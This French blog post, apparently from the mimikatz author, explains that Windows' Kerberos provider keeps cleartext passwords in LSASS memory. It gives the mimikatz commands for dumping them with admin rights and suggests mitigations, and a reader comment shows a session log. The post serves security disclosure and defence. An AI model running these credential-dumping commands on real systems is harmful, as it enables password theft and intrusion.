Re – re – re – pass the pass (word)


homer
Certains tendent le bâton… :(

Fournir aisément à autrui, par ses dires ou son comportement, l’occasion, la raison ou le simple prétexte de se faire blâmer, condamner ou punir.


Après le dernier billet sur « re – re – pass the pass » et…

  • l’absence de réaction (oui, cela a été rapide :)
  • une bonne question

… voici la suite !

Le provider

Cette fois ci nous avons le provider Kerberos ! Son fonctionnement par ticket n’impose normalement pas la réutilisation des mot de passe en clair.
Cf. une explication rapide de Microsoft : http://technet.microsoft.com/en-us/library/bb742516.aspx
kerberos par MS

Ce qui est dommage, c’est qu’une fois de plus des mots de passe sont encore conservés dans la mémoire du processus LSASS (en particulier à partir de NT 6).
mimikatz_vs_kerberos

Téléchargement et fonctionnement

Une mise à jour de mimikatz existe, mais elle n’est toujours pas disponible en téléchargement… (merci à nos amis éditeurs antivirus et Microsoft qui choisis de blacklister plutôt que d’améliorer ses processus)
Plus de release avant fin mai

A exécuter après avoir obtenu des droits administrateurs (ou system) :

privilege::debug
inject::service samss sekurlsa.dll
@getLogonPasswords full

La commande privilege::debug n’est pas obligatoire si vous êtes déjà system.
(plus d’information : http://blog.gentilkiwi.com/mimikatz/librairies/sekurlsa#getLogonPasswords et http://blog.gentilkiwi.com/mimikatz/librairies/sekurlsa/kerberos)

Nouvelles commandes (si besoin de séparation) :

@getMSV
@getTsPkg
@getWDigest
@getLiveSSP
@getKerberos

@getLogonPasswords utilise les providers disponibles et connus par mimikatz.

Améliorations

  • ne garder que kerberos, msv1_0 et schannel dans la liste des providers autorisés (se référer au billet d’origine sur « pass the pass »)
    Utiliser Kerberos uniquement avec des Tokens et Cartes à puce (sans délégation)
    ils sont essentiels au fonctionnement des services Windows
  • demander à Microsoft la validité de ce mode de fonctionnement avec un minimum de provider (je n’y crois vraiment plus…)

5 réflexions au sujet de « Re – re – re – pass the pass (word) »

  1. Hi Gentil Kiwi! :-)
    Please explain why I have the error on Windows Server 2008?
    Thanks,
    Oscar.

    C:\Windows\system32>c:\m\win32\mimikatz
    mimikatz 1.0 x86 (RC)   /* Traitement du Kiwi (Jan 23 2013 00:13:21) */
    // http://blog.gentilkiwi.com/mimikatz
    
    mimikatz # privilege::debug
    Demande d'ACTIVATION du privil├иge : SeDebugPrivilege : OK
    
    mimikatz # sekurlsa::logonPasswords full
    mod_process::getVeryBasicModulesListForProcess : (0x0000012b) ╨Ч╨░╨┐╤А╨╛╤Б ReadProcessMemory ╨╕╨╗╨╕ WriteProcessMemory ╨▒╤Л╨╗ ╨▓╤Л╨┐╨╛╨╗╨╜╨╡╨╜ ╤В╨╛╨╗╤М╨║╨╛ ╤З╨░╤Б╤В╨╕╤З╨╜╨╛.
    Donn├йes LSASS en erreur
    
    mimikatz #
  2. Peut-on forcer Windows à vider cette cache lorsque l’usager ferme sa session? Bien que ça n’élimine pas totalement le risque, ça réduit le facteur temps.

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *